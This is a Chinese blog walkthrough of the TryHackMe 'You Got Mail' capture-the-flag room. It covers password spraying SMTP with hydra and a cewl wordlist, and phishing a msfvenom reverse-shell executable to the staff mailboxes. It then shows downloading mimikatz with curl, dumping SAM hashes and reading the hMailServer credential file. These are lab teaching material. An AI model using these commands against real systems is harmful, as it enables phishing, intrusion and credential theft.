<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    
    <title>You Got Mail（THM） | T1ng的摆烂日常</title>
    
    
        <meta property="og:site_name" content="T1ng的摆烂日常">
    
    
        <meta property="article:author" content="T1ng">
    
    
        <link rel="icon" href="/img/t1ng.ico">
    
    
<link rel="stylesheet" href="/css/minireset.min.css">

    
<link rel="stylesheet" href="/css/all.min.css">

    
<link rel="stylesheet" href="/css/csshake.min.css">

    
<link rel="stylesheet" href="/css/hljs/lioshi.css">

    
<link rel="stylesheet" href="/css/jquery.fancybox.min.css">

    
<link rel="stylesheet" href="/styl/main.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/highlight.min.js"></script>

    
<script src="/js/jquery.fancybox.min.js"></script>

    
<script src="/js/clipboard.min.js"></script>

    
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <header>
  <div class="outer">
    <div class="inner">
      <h1 class="logo-wrap">
        <a>T1ng的摆烂日常<b><sup></sup></b></a>
      </h1>
    </div>
    <div class="inner">
      <nav class="main-nav">
        
          
            <a href="/">首页</a>
          
        
          
            <a href="/archives">归档</a>
          
        
          
            <a href="/categories">分类</a>
          
        
          
            <a href="/tags">标签</a>
          
        
          
            <a href="/friends">友链</a>
          
        
          
            <div class="dropdown">
              <a class="dropbtn">相关链接</a>
              <div class="dropdown-content">
                
              </div>
            </div>
          
        
          
            <a href="/about">关于</a>
          
        
      </nav>
    </div>
  </div>
</header>
    <div class="content">
        <section class="outer">
    <article>
        <div class="article-title">
    <h2>
        <a href="/2025/02/25/YouGotMail/" class="shake shake-little" title="You Got Mail（THM）">
            
            You Got Mail（THM）
        </a>
    </h2>
    <div class="meta_box">
    
        
        
            
                
        
        <div class="meta meta_auth">
            <img src="/img/t1ng.png" alt="head" />
            <p>t1ng</p>
        </div>
    
        
        
        <div class="meta meta_date">
            <i class="fas fa-calendar-alt fa-fw" aria-hidden="true"></i>
            <p>发布于：2025年02月25日</p>
        </div>
    
        <div class="meta meta_update">
            <i class="fas fa-edit fa-fw" aria-hidden="true"></i>
            <p>更新于：2025年02月25日</p>
        </div>
    </div>
    
  <div class="post_tags">
    <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/THM/" rel="tag"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>THM</a></li></ul>
  </div>


</div>

        <hr>
        <div class="article-entry">
            
            
            
            <p>先查看题目给出的网站<br><img src="/2025/02/25/YouGotMail/667c671cc1a91a091bfd34d6b4aa338e.png"><br>在Our Team页面发现一些邮箱，根据题目内容可能和题目有关<br><img src="/2025/02/25/YouGotMail/d7e9da3c9f4fc60a659357cf17d03700.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">root㉿T1ngWin vim email.txt</span><br><span class="line"></span><br><span class="line">fstamatis@brownbrick.co</span><br><span class="line">pcathrine@brownbrick.co</span><br><span class="line">tchikondi@brownbrick.co</span><br><span class="line">lhedvig@brownbrick.co</span><br><span class="line">wrohit@brownbrick.co</span><br><span class="line">oaurelius@brownbrick.co</span><br></pre></td></tr></table></figure>

<p>没什么思路了，先查看一下端口吧<br>nmap扫描发现只有一些邮件服务和一些Winodws服务开放</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">root@ip-10-10-154-154:~# nmap -T4 -n -sC -sV -Pn -p- 10.10.84.228</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-13 18:48 GMT</span><br><span class="line">Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan</span><br><span class="line">Service scan Timing: About 52.63% done; ETC: 18:50 (0:00:32 remaining)</span><br><span class="line">Nmap scan report for 10.10.84.228</span><br><span class="line">Host is up (0.00030s latency).</span><br><span class="line">Not shown: 65516 closed ports</span><br><span class="line">PORT      STATE SERVICE       VERSION</span><br><span class="line">25/tcp    open  smtp          hMailServer smtpd</span><br><span class="line">| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP, </span><br><span class="line">|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY </span><br><span class="line">110/tcp   open  pop3          hMailServer pop3d</span><br><span class="line">|_pop3-capabilities: USER UIDL TOP</span><br><span class="line">135/tcp   open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">143/tcp   open  imap          hMailServer imapd</span><br><span class="line">|_imap-capabilities: OK CHILDREN IDLE NAMESPACE IMAP4rev1 RIGHTS=texkA0001 IMAP4 CAPABILITY completed SORT ACL QUOTA</span><br><span class="line">445/tcp   open  microsoft-ds?</span><br><span class="line">587/tcp   open  smtp          hMailServer smtpd</span><br><span class="line">| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP, </span><br><span class="line">|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY </span><br><span class="line">3389/tcp  open  ms-wbt-server Microsoft Terminal Services</span><br><span class="line">| rdp-ntlm-info: </span><br><span class="line">|   Target_Name: BRICK-MAIL</span><br><span class="line">|   NetBIOS_Domain_Name: BRICK-MAIL</span><br><span class="line">|   NetBIOS_Computer_Name: BRICK-MAIL</span><br><span class="line">|   DNS_Domain_Name: BRICK-MAIL</span><br><span class="line">|   DNS_Computer_Name: BRICK-MAIL</span><br><span class="line">|   Product_Version: 10.0.17763</span><br><span class="line">|_  System_Time: 2025-02-13T18:50:40+00:00</span><br><span class="line">| ssl-cert: Subject: commonName=BRICK-MAIL</span><br><span class="line">| Not valid before: 2025-02-12T18:45:16</span><br><span class="line">|_Not valid after:  2025-08-14T18:45:16</span><br><span class="line">|_ssl-date: 2025-02-13T18:50:45+00:00; 0s from scanner time.</span><br><span class="line">5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">7680/tcp  open  pando-pub?</span><br><span class="line">47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">49664/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49665/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49666/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49667/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49668/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49669/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49671/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">49674/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">MAC Address: 02:ED:BB:0E:C7:39 (Unknown)</span><br><span class="line">Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_nbstat: NetBIOS name: BRICK-MAIL, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 02:ed:bb:0e:c7:39 (unknown)</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   2.02: </span><br><span class="line">|_    Message signing enabled but not required</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2025-02-13T18:50:39</span><br><span class="line">|_  start_date: N/A</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 142.61 seconds</span><br></pre></td></tr></table></figure>

<p>好像并没有什么用，尝试根据网站创建自定义密码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cewl --lowercase https://brownbrick.co/ &gt; passwords.txt</span><br></pre></td></tr></table></figure>

<p>hydra测试邮箱登录密码（nmap扫描得到smtp端口为587）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L email.txt -P password.txt 10.10.84.228 smtp -s 587 -t 16</span><br></pre></td></tr></table></figure>

<p><img src="/2025/02/25/YouGotMail/c8608fafe5c0b2c4789458a04b763577.png">获得邮箱账号登录密码，尝试利用反向shell创建可执行文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.200.215 LPORT=443 -f exe -o shell.exe</span><br></pre></td></tr></table></figure>

<p>使用已经获取账户密码的用户发送可执行文件到其他用户</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for email in $(cat email.txt); do sendemail -f &quot;lhedvig@brownbrick.co&quot; -t &quot;$email&quot; -u &quot;test&quot; -m &quot;test&quot; -a shell.exe -s 10.10.84.228:25 -xu &quot;lhedvig@brownbrick.co&quot; -xp &quot;bricks&quot;; done </span><br></pre></td></tr></table></figure>

<p>发送成功<br><img src="/2025/02/25/YouGotMail/7b55538990b1f3b03cf57a415715f964.png"><br>同时监听443端口</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lnvp 443</span><br></pre></td></tr></table></figure>

<p><img src="/2025/02/25/YouGotMail/29a41743e330c4d6afae6484bc4984c0.png"><br>发现此时的权限是wrohit，尝试获取桌面flag</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dir C:\Users\wrohit\Desktop</span><br><span class="line">type C:\Users\wrohit\Desktop\flag.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2025/02/25/YouGotMail/6eb99a9624e7d686bb3be955787bcfbc.png"><br>接下来尝试查找wrohit用户的密码，此时该用户是位于Administrators下的，所以只需要把mimikatz.exe上传即可，上传至ProgramData文件夹内</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://10.10.200.215:8888/mimikatz.exe -o mimikatz.exe</span><br></pre></td></tr></table></figure>

<p>利用mimikatz获取哈希密码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\mimikatz.exe &quot;token::elevate&quot; &quot;lsadump::sam&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2025/02/25/YouGotMail/1c7a8fbb3cee2b5e8f7c1d8b2db34f4e.png"><br>在线平台破解哈希即可 <a target="_blank" rel="noopener" href="https://crackstation.net/">https://crackstation.net/</a><br><img src="/2025/02/25/YouGotMail/fcb42c276516424eb3a2f9bdfdb023ee.png"><br>最后任务是找到hMailServer Administrator Dashboard<br>该密码存在在在<code>C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI</code><br>读取文件即可</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type &quot;C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2025/02/25/YouGotMail/f9c9c1df8587bd0d2a24ceca819a5c18.png"><br>破解哈希<br><img src="/2025/02/25/YouGotMail/714215a672e9cb9b2449ccddce01fdd8.png"><br>结束</p>
<p><img src="/2025/02/25/YouGotMail/9304f15558c8f132b296223569b71418.png"></p>

            <div class="article-copyright">
                

            </div>
        </div>
    </article>
    


</section>
    </div>
    <footer>
    <div class="outer">
        <div class="inner">
            Powered by <a href="https://github.com/hdxw/hexo-theme-prowiki" target="_blank">ProWiki</a>
            &copy;2025 t1ng<br>
            <a target="_blank" rel="noopener" href="http://beian.miit.gov.cn/"></a>
            <div style="height: 50px;"></div>
        </div>
    </div>
</footer>

<script src="/js/custom.js"></script>


    <script>onload_content();</script>

</body>
</html>
